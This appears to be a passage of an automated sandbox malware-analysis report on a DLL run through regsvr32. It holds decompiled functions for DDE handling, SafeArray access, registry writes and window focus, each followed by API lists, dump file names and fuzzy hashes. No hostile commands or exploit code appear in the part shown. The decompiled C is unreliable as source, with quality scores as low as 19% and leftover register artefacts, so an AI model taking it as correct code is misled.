                                                                                                                • UnpackDDElParam.USER32(000003E8,?,?,?), ref: 10037D4D
                                                                                                                • GlobalLock.KERNEL32 ref: 10037D55
                                                                                                                • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 10037D7F
                                                                                                                • ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 10037D9F
                                                                                                                • PostMessageA.USER32(?,000003E4,?,00000000), ref: 10037DAF
                                                                                                                  • Part of subcall function 1001795E: IsWindowEnabled.USER32(?), ref: 10017967
                                                                                                                  • Part of subcall function 1000FED3: _strlen.LIBCMT ref: 1000FEE6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalParam$EnabledH_prolog3_catchLockMessagePostReuseUnlockUnpackWindow_strlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1660452366-0
                                                                                                                • Opcode ID: af835a2c362e95771019e0bdb8b7fa5e0c4075070ac9fed6cb397af1f94e2370
                                                                                                                • Instruction ID: c983e17f3d8bc18d83424c477c4f136d14217cd03d05b8c9496dd5e1b9f8dfa4
                                                                                                                • Opcode Fuzzy Hash: af835a2c362e95771019e0bdb8b7fa5e0c4075070ac9fed6cb397af1f94e2370
                                                                                                                • Instruction Fuzzy Hash: 5E218C39900109AFDF05DBA0CD4AAEEBB79FF05351F148264F515AB2E1DB34AA44DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 19%
                                                                                                                			E100232E6(void* __eax, void* __ebx, void* __edi, void* __esi, char _a4, char _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				char _v16;
                                                                                                                				short _v28;
                                                                                                                				signed short _v32;
                                                                                                                				char* _t25;
                                                                                                                				short* _t27;
                                                                                                                				void* _t34;
                                                                                                                				short* _t35;
                                                                                                                				signed short _t36;
                                                                                                                				char _t37;
                                                                                                                				signed int _t38;
                                                                                                                				void* _t39;
                                                                                                                				short* _t41;
                                                                                                                
                                                                                                                				_t39 = __edi;
                                                                                                                				_t34 = __ebx;
                                                                                                                				_t41 = _a4;
                                                                                                                				if( *_t41 != 0x2011) {
                                                                                                                					L7:
                                                                                                                					__imp__#9(_t41);
                                                                                                                					_v12 = _v12 & 0x00000000;
                                                                                                                					_v16 = _a8;
                                                                                                                					_t25 =  &_v16;
                                                                                                                					 *_t41 = 0x2011;
                                                                                                                					__imp__#15(0x11, 1, _t25);
                                                                                                                					__eflags = _t25;
                                                                                                                					 *((intOrPtr*)(_t41 + 8)) = _t25;
                                                                                                                					if(__eflags != 0) {
                                                                                                                						goto L6;
                                                                                                                					} else {
                                                                                                                						E1000A035(_t34, _t35, _t39, _t41, __eflags);
                                                                                                                						asm("int3");
                                                                                                                						__eflags = _v28 - 0xb;
                                                                                                                						_t27 = _t35;
                                                                                                                						_t36 = _v32;
                                                                                                                						if(_v28 != 0xb) {
                                                                                                                							 *_t27 = 2;
                                                                                                                						} else {
                                                                                                                							_t36 =  ~_t36;
                                                                                                                							 *_t27 = 0xb;
                                                                                                                							asm("sbb ecx, ecx");
                                                                                                                						}
                                                                                                                						 *(_t27 + 8) = _t36;
                                                                                                                						return _t27;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					__imp__#17( *((intOrPtr*)(_t41 + 8)));
                                                                                                                					if(__eax != 1) {
                                                                                                                						goto L7;
                                                                                                                					} else {
                                                                                                                						__imp__#20( *((intOrPtr*)(_t41 + 8)), 1,  &_v8);
                                                                                                                						E1002303B( &_v8);
                                                                                                                						__imp__#19( *((intOrPtr*)(_t41 + 8)), 1,  &_a4);
                                                                                                                						E1002303B( &_a4);
                                                                                                                						_t38 = _v8;
                                                                                                                						_t25 = _a4 - _t38;
                                                                                                                						if(_t25 < 0) {
                                                                                                                							_t25 = 0;
                                                                                                                						}
                                                                                                                						_t37 = _a8;
                                                                                                                						if(_t25 != _t37) {
                                                                                                                							_v16 = _t37;
                                                                                                                							_v12 = _t38;
                                                                                                                							__imp__#40( *((intOrPtr*)(_t41 + 8)),  &_v16);
                                                                                                                							_t25 = E1002303B( &_v16);
                                                                                                                						}
                                                                                                                						L6:
                                                                                                                						return _t25;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • SafeArrayGetDim.OLEAUT32(?), ref: 100232FA
                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 1002330E
                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10023323
                                                                                                                • SafeArrayRedim.OLEAUT32(?,?), ref: 1002334F
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10023361
                                                                                                                • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 1002337E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$Bound$ClearCreateRedimVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 3151960920-0
                                                                                                                • Opcode ID: 74622e245c82e6acfce378bfb7d6aa84b8e82f5106b0b07f4b7fd66f95b90c83
                                                                                                                • Instruction ID: c9470c1b6fd187e16e6dce7b7d25325f3df280aac33c778134fea66dad733e72
                                                                                                                • Opcode Fuzzy Hash: 74622e245c82e6acfce378bfb7d6aa84b8e82f5106b0b07f4b7fd66f95b90c83
                                                                                                                • Instruction Fuzzy Hash: 8E114979900219AFEB10EFA4CD85ADE7BB9EF04340F90C4A5F945D6160D770EB908B50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 25%
                                                                                                                			E10023DDD(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4) {
                                                                                                                				char _v8;
                                                                                                                				char _v12;
                                                                                                                				char _v16;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t17;
                                                                                                                				void* _t18;
                                                                                                                				signed int _t20;
                                                                                                                				void* _t29;
                                                                                                                				void* _t36;
                                                                                                                
                                                                                                                				_t16 =  &_v16;
                                                                                                                				_t29 = __ecx;
                                                                                                                				__imp__#23( *((intOrPtr*)(__ecx + 8)),  &_v16);
                                                                                                                				_t17 = E1002303B(_t16);
                                                                                                                				__imp__#17( *((intOrPtr*)(__ecx + 8)));
                                                                                                                				if(_t17 != 1) {
                                                                                                                					_t18 = E10034149(_a4, 0, 0xffffffff);
                                                                                                                				} else {
                                                                                                                					__imp__#20( *((intOrPtr*)(__ecx + 8)), 1,  &_v12, __esi, __ebx);
                                                                                                                					_t20 =  &_v8;
                                                                                                                					__imp__#19( *((intOrPtr*)(__ecx + 8)), 1, _t20);
                                                                                                                					__imp__#18( *((intOrPtr*)(__ecx + 8)));
                                                                                                                					_t24 = _t20 * (_v8 - _v12 + 1);
                                                                                                                					_t34 = _a4;
                                                                                                                					E10034149(_a4, _t20 * (_v8 - _v12 + 1), 0xffffffff);
                                                                                                                					_t18 = E1000A7FB(__ecx, _t34, _t36,  *((intOrPtr*)(_t34 + 4)), _t24, _v16, _t24);
                                                                                                                				}
                                                                                                                				__imp__#24( *((intOrPtr*)(_t29 + 8)));
                                                                                                                				return _t18;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 10023DED
                                                                                                                • SafeArrayGetDim.OLEAUT32(?), ref: 10023DFC
                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 10023E12
                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 10023E21
                                                                                                                • SafeArrayGetElemsize.OLEAUT32(?), ref: 10023E31
                                                                                                                  • Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 10023E6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$BoundData$AccessElemsizeUnaccess_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 719575404-0
                                                                                                                • Opcode ID: aca1a04e240cfd435acfad997ca7495032af3768ab9d60342f47d699824fa216
                                                                                                                • Instruction ID: cd6b60c9eaf2634be566483e00a3dd84f594c3239c15aba867d25aa922b9696a
                                                                                                                • Opcode Fuzzy Hash: aca1a04e240cfd435acfad997ca7495032af3768ab9d60342f47d699824fa216
                                                                                                                • Instruction Fuzzy Hash: BA11CE7A500019BFEF019BA4CD85DDDBB7DFB05350F008251F925E21E0CB31AEA08B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10026082(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
                                                                                                                				long _t21;
                                                                                                                				void* _t28;
                                                                                                                
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                                                                                					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x68));
                                                                                                                				}
                                                                                                                				if(_a8 != 0) {
                                                                                                                					_t28 = E10025F4C(__ecx, _a4);
                                                                                                                					if(_a12 != 0) {
                                                                                                                						if(_t28 == 0) {
                                                                                                                							L3:
                                                                                                                							return 0;
                                                                                                                						}
                                                                                                                						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
                                                                                                                						L10:
                                                                                                                						RegCloseKey(_t28);
                                                                                                                						return 0 | _t21 == 0x00000000;
                                                                                                                					}
                                                                                                                					if(_t28 == 0) {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                					_t21 = RegDeleteValueA(_t28, _a8);
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				_t28 = E10025EBB(__ecx);
                                                                                                                				if(_t28 != 0) {
                                                                                                                					_t21 = RegDeleteKeyA(_t28, _a4);
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				goto L3;
                                                                                                                			}






                                                                                                                APIs
                                                                                                                • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 100260A6
                                                                                                                • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 100260C6
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 100260F1
                                                                                                                  • Part of subcall function 10025EBB: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10025EE9
                                                                                                                  • Part of subcall function 10025EBB: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F0C
                                                                                                                  • Part of subcall function 10025EBB: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10025F28
                                                                                                                  • Part of subcall function 10025EBB: RegCloseKey.ADVAPI32(?), ref: 10025F38
                                                                                                                  • Part of subcall function 10025EBB: RegCloseKey.ADVAPI32(?), ref: 10025F42
                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002610C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 1886894508-0
                                                                                                                • Opcode ID: 739dd54ac3e5e47e5b44a4a10ede1c953d139bba1ffcaf7826abd38b2a5bc1c7
                                                                                                                • Instruction ID: 88889b090a1c033fd2a8edf356c12eeefb5eb30433966703c4018381315e71d3
                                                                                                                • Opcode Fuzzy Hash: 739dd54ac3e5e47e5b44a4a10ede1c953d139bba1ffcaf7826abd38b2a5bc1c7
                                                                                                                • Instruction Fuzzy Hash: AD117032001629BBDF228F60EE84B9F3B66EF09791F518150FE1595061CB76DD61EBD0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 25%
                                                                                                                			E10024316(void* __ebx, void* __ecx, void* __esi, intOrPtr _a4) {
                                                                                                                				char _v8;
                                                                                                                				char _v12;
                                                                                                                				char _v16;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t17;
                                                                                                                				void* _t18;
                                                                                                                				signed int _t20;
                                                                                                                				void* _t29;
                                                                                                                				void* _t36;
                                                                                                                
                                                                                                                				_t16 =  &_v16;
                                                                                                                				_t29 = __ecx;
                                                                                                                				__imp__#23( *((intOrPtr*)(__ecx + 8)),  &_v16);
                                                                                                                				_t17 = E1002303B(_t16);
                                                                                                                				__imp__#17( *((intOrPtr*)(__ecx + 8)));
                                                                                                                				if(_t17 != 1) {
                                                                                                                					_t18 = E10034149(_a4, 0, 0xffffffff);
                                                                                                                				} else {
                                                                                                                					__imp__#20( *((intOrPtr*)(__ecx + 8)), 0,  &_v12, __esi, __ebx);
                                                                                                                					_t20 =  &_v8;
                                                                                                                					__imp__#19( *((intOrPtr*)(__ecx + 8)), 0, _t20);
                                                                                                                					__imp__#18( *((intOrPtr*)(__ecx + 8)));
                                                                                                                					_t24 = _t20 * (_v8 - _v12 + 1);
                                                                                                                					_t34 = _a4;
                                                                                                                					E10034149(_a4, _t20 * (_v8 - _v12 + 1), 0xffffffff);
                                                                                                                					_t18 = E1000A7FB(__ecx, _t34, _t36,  *((intOrPtr*)(_t34 + 4)), _t24, _v16, _t24);
                                                                                                                				}
                                                                                                                				__imp__#24( *((intOrPtr*)(_t29 + 8)));
                                                                                                                				return _t18;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 10024326
                                                                                                                • SafeArrayGetDim.OLEAUT32(?), ref: 10024335
                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000000,?), ref: 1002434B
                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000000,?), ref: 1002435A
                                                                                                                • SafeArrayGetElemsize.OLEAUT32(?), ref: 1002436A
                                                                                                                  • Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B
                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 100243A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$BoundData$AccessElemsizeUnaccess_memcpy_s
                                                                                                                • String ID:
                                                                                                                • API String ID: 719575404-0
                                                                                                                • Opcode ID: 023910519ade7b6da1154d5bb273ae02a7a76c49b5332ced2433e9f64de07e6a
                                                                                                                • Instruction ID: 88db7224a8a0f5af019c71018b507da94ff957cc0a1cbedb2de26f508a1d3972
                                                                                                                • Opcode Fuzzy Hash: 023910519ade7b6da1154d5bb273ae02a7a76c49b5332ced2433e9f64de07e6a
                                                                                                                • Instruction Fuzzy Hash: 84118E7A500529BFEB019BA4CE85EDDBB7DFB05350F104250F925E62A0CB31BE618B90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10021CE5(struct HWND__* _a4) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				struct HWND__* _t3;
                                                                                                                				struct HWND__* _t6;
                                                                                                                				void* _t7;
                                                                                                                				void* _t10;
                                                                                                                				struct HWND__* _t12;
                                                                                                                				struct HWND__* _t15;
                                                                                                                
                                                                                                                				_t3 = GetFocus();
                                                                                                                				_t15 = _t3;
                                                                                                                				if(_t15 != 0) {
                                                                                                                					_t12 = _a4;
                                                                                                                					if(_t15 == _t12) {
                                                                                                                						L10:
                                                                                                                						return _t3;
                                                                                                                					}
                                                                                                                					_push(_t7);
                                                                                                                					if(E10021BD1(_t7, _t10, _t12, _t15, 3) != 0) {
                                                                                                                						L5:
                                                                                                                						if(_t12 == 0 || (GetWindowLongA(_t12, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                                							L8:
                                                                                                                							_t3 = SendMessageA(_t15, 0x14f, 0, 0);
                                                                                                                							goto L9;
                                                                                                                						} else {
                                                                                                                							_t6 = GetParent(_t12);
                                                                                                                							_t3 = GetDesktopWindow();
                                                                                                                							if(_t6 == _t3) {
                                                                                                                								L9:
                                                                                                                								goto L10;
                                                                                                                							}
                                                                                                                							goto L8;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t3 = GetParent(_t15);
                                                                                                                					_t15 = _t3;
                                                                                                                					if(_t15 == _t12) {
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					_t3 = E10021BD1(GetParent, _t10, _t12, _t15, 2);
                                                                                                                					if(_t3 == 0) {
                                                                                                                						goto L9;
                                                                                                                					}
                                                                                                                					goto L5;
                                                                                                                				}
                                                                                                                				return _t3;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • GetFocus.USER32 ref: 10021CE6
                                                                                                                • GetParent.USER32(00000000), ref: 10021D0F
                                                                                                                  • Part of subcall function 10021BD1: GetWindowLongA.USER32(00000000,000000F0), ref: 10021BF0
                                                                                                                  • Part of subcall function 10021BD1: GetClassNameA.USER32(00000000,?,0000000A), ref: 10021C05
                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 10021D2A
                                                                                                                • GetParent.USER32(?), ref: 10021D38
                                                                                                                • GetDesktopWindow.USER32 ref: 10021D3C
                                                                                                                • SendMessageA.USER32 ref: 10021D50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$LongParent$ClassDesktopFocusMessageNameSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3020784601-0
                                                                                                                • Opcode ID: d58242019f919fb857ad829fdaa9ba1b73f2274177c44ac2e7b1d689e4a51cb5
                                                                                                                • Instruction ID: 99b8e3808f96a69b3d538ace9a8887a7a6fbfffd02d8e37485124c6c5aeb4666
                                                                                                                • Opcode Fuzzy Hash: d58242019f919fb857ad829fdaa9ba1b73f2274177c44ac2e7b1d689e4a51cb5
                                                                                                                • Instruction Fuzzy Hash: C4F0A43E940521BAE36297296D85FEE62DADFA7AD0FD20314F916A61A0DB34DC4140E8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E10027494(void* _a4, char* _a8, char* _a12) {
                                                                                                                				void* _t14;
                                                                                                                				long _t18;
                                                                                                                				signed int _t20;
                                                                                                                				long _t25;
                                                                                                                
                                                                                                                				if(_a12 != 0) {
                                                                                                                					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
                                                                                                                						L6:
                                                                                                                						_t14 = 0;
                                                                                                                						L7:
                                                                                                                						return _t14;
                                                                                                                					}
                                                                                                                					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
                                                                                                                					_t18 = RegCloseKey(_a4);
                                                                                                                					if(_t18 != 0 || _t25 != 0) {
                                                                                                                						goto L6;
                                                                                                                					} else {
                                                                                                                						_t14 = _t18 + 1;
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
                                                                                                                				asm("sbb eax, eax");
                                                                                                                				return  ~_t20 + 1;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(?), ref: 100274A0
                                                                                                                • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 100274B4
                                                                                                                • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 100274CE
                                                                                                                • lstrlenA.KERNEL32(?), ref: 100274DB
                                                                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 100274F0
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 100274FB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Valuelstrlen$CloseCreate
                                                                                                                • String ID:
                                                                                                                • API String ID: 306239685-0
                                                                                                                • Opcode ID: b98d6f689e483a70c17520ea159640c3281620c63b2fce4f4f9897c40c2de14e
                                                                                                                • Instruction ID: 1a083539fbb7e3cf4d2df25f18eb296ca7e546c33c8e0ee3a617baa585e2e8d4
                                                                                                                • Opcode Fuzzy Hash: b98d6f689e483a70c17520ea159640c3281620c63b2fce4f4f9897c40c2de14e
                                                                                                                • Instruction Fuzzy Hash: 03012832100129BFEF029FA0EC48FDA3B69FB09391F118050FE1AD9060D7B18AA0DB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 38%
                                                                                                                			E10021C73(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                                                                                				struct tagRECT _v20;
                                                                                                                				struct HWND__* _t12;
                                                                                                                				struct HWND__* _t21;
                                                                                                                
                                                                                                                				ClientToScreen(_a4,  &_a8);
                                                                                                                				_push(5);
                                                                                                                				_push(_a4);
                                                                                                                				while(1) {
                                                                                                                					_t12 = GetWindow();
                                                                                                                					_t21 = _t12;
                                                                                                                					if(_t21 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                                                                                						GetWindowRect(_t21,  &_v20);
                                                                                                                						_push(_a12);
                                                                                                                						if(PtInRect( &_v20, _a8) != 0) {
                                                                                                                							return _t21;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_push(2);
                                                                                                                					_push(_t21);
                                                                                                                				}
                                                                                                                				return _t12;
                                                                                                                			}







                                                                                                                APIs
                                                                                                                • ClientToScreen.USER32(?,?), ref: 10021C82
                                                                                                                • GetDlgCtrlID.USER32 ref: 10021C96
                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 10021CA4
                                                                                                                • GetWindowRect.USER32 ref: 10021CB6
                                                                                                                • PtInRect.USER32(?,?,?), ref: 10021CC6
                                                                                                                • GetWindow.USER32(?,00000005), ref: 10021CD3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1315500227-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1002A471(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				short _v72;
                                                                                                                				char* _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int* _v84;
                                                                                                                				signed int _v88;
                                                                                                                				intOrPtr _v92;
                                                                                                                				void* __edi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t54;
